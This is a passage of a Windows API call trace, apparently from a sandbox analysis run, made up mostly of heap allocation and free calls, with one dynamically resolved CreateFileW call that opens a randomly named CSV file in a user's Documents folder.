hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0081.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.667] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb090 [0081.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb090, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.668] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0081.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hhinqxz8ubmidhbj07.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0081.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0081.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0081.670] FreeLibrary (hLibModule=0x772d0000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4bf0 | out: hHeap=0x1780000) returned 1 [0081.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.671] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.672] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.672] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0081.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0081.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 